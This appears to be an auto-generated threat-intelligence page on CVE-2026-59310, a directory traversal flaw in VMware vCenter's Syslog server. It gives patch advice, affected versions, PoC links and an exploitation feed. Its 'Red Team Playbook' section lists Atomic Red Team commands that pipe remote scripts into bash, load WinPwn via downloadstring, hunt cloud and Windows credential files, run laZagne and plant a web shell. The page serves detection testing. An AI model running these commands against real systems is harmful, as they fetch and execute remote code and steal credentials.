CVE-2026-59310
Overview
This vulnerability is a directory traversal flaw within the VMware vCenter Syslog server component of VMware Cloud Foundation. The root cause lies in insufficient validation of file path inputs, allowing crafted requests to access arbitrary filesystem locations. This improper sanitization enables manipulation of file paths processed by the Syslog server, exposing underlying system directories.
Vulnerability Description
VMware vCenter contains a directory traversal vulnerability in the Syslog server. A malicious actor with network access to vCenter may exploit this issue to execute arbitrary code.
Impact
An unauthenticated attacker with network access to the vCenter server can exploit this vulnerability to execute arbitrary code with system-level privileges. This enables full compromise of the affected VMware Cloud Foundation environment, including unauthorized access to sensitive data and control over virtual infrastructure. The exploit does not require user interaction or credentials, facilitating rapid lateral movement and potential disruption of cloud management operations.
Solution
VMware has released security advisory VMSA-2026-0001 addressing this issue in VMware Cloud Foundation. Users should apply the patches included in this advisory to affected vCenter versions immediately. Detailed patching instructions and version-specific fixes are available at the VMware security advisory portal: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/38017. No workarounds are recommended; updating to the fixed versions is mandatory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The directory traversal vulnerability in VMware vCenter's Syslog server presents a significant security risk due to its potential to allow unauthorized access to sensitive files and execution of arbitrary code. This vulnerability arises from inadequate input validation, enabling an attacker to manipulate file paths and access files outside the intended directory structure. By exploiting this flaw, a malicious actor can craft specially designed requests that traverse the directory hierarchy, thereby gaining access to critical system files or configuration data. The ability to execute arbitrary code further amplifies the severity of this vulnerability, as it can lead to full system compromise.
Attack vectors for this vulnerability are primarily network-based, targeting systems that have network access to the vCenter server. An attacker could leverage various methods, such as sending crafted requests through the Syslog interface, to exploit the directory traversal flaw. Once access is gained, the attacker can execute malicious payloads, potentially leading to unauthorized control over the vCenter server. Scenarios may include deploying malware, exfiltrating sensitive data, or manipulating virtual machine configurations. The exploitation of this vulnerability could be particularly damaging in environments where vCenter manages critical virtualized infrastructure, as it could disrupt operations and lead to significant downtime.
The real-world impact of this vulnerability is profound, especially for organizations relying on VMware vCenter for managing their virtual environments. The high CVSS score indicates a critical risk level, suggesting that successful exploitation could result in severe consequences, including data breaches, loss of data integrity, and operational disruptions. Businesses may face regulatory penalties, reputational damage, and financial losses due to the fallout from such an incident. The potential for attackers to gain control over virtual machines could also lead to further exploitation of interconnected systems, exacerbating the overall risk landscape.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching VMware vCenter installations is crucial, as vendors often release security updates to address known vulnerabilities. Additionally, organizations should employ intrusion detection and prevention systems (IDPS) to monitor network traffic for suspicious activities indicative of exploitation attempts. Implementing strict access controls and network segmentation can also help limit exposure to the Syslog server, reducing the attack surface. Regular security audits and vulnerability assessments should be conducted to identify and remediate potential weaknesses in the environment.
In conclusion, the directory traversal vulnerability in VMware vCenter's Syslog server poses a significant threat to organizations that utilize this platform for managing their virtualized environments. The potential for arbitrary code execution, combined with the ease of exploitation, underscores the urgency for organizations to prioritize security measures. By adopting proactive detection and mitigation strategies, businesses can safeguard their infrastructure against this and similar vulnerabilities, ensuring the integrity and availability of their critical systems.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-59310, accompanied by the emergence of new publicly available proof-of-concept exploit code. This development has broadened the exploit landscape, making it more accessible to a wider range of threat actors. Additionally, the vulnerability’s inclusion in the CISA KEV catalog underscores its prioritization at the federal level, signaling increased attention and likely accelerated exploitation efforts. Our telemetry indicates a significant upward trend in exploitation activity, reflected in a doubling of the EPSS score, which suggests growing attacker interest and capability. These changes elevate the threat level from high to critical, as the combination of expanded exploit availability and heightened detection frequency increases the likelihood of successful compromise in unpatched environments. Defenders should recognize that adversaries are rapidly adapting to leverage this vulnerability, amplifying the urgency for vigilant monitoring and response.
Affected Products (27)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Vcenter Server | All |
cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update3:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update3a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update3b:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
HORKimhab/CVE-2026-59310
CVE-2026-59310
|
HORKimhab | 0 | 0 | 2026-08-17 | View |
|
BiuTrap/CVE-2026-59310
CVE-2026-59310 PoC
|
BiuTrap | 0 | 0 | 2026-08-17 | View |
Threat Feed
27 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: Broadcom, product: VMware vCenter
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-59310 |
| support.broadcom.com |
GitHub CVE
|
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/38017 |
| medium.com |
NVD API
Third Party Advisory
|
https://medium.com/@quirso_de/active-exploitation-of-cve-2026-59310-361-victim-ips-across-47-countries-9783187cc6ff |
| medium.com |
NVD API
Third Party Advisory
|
https://medium.com/@quirso_de/global-exploitation-of-cve-2026-59310-by-suspected-chinese-nexus-apt-related-cve-2026-59309-443a79e1466d |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-59310 |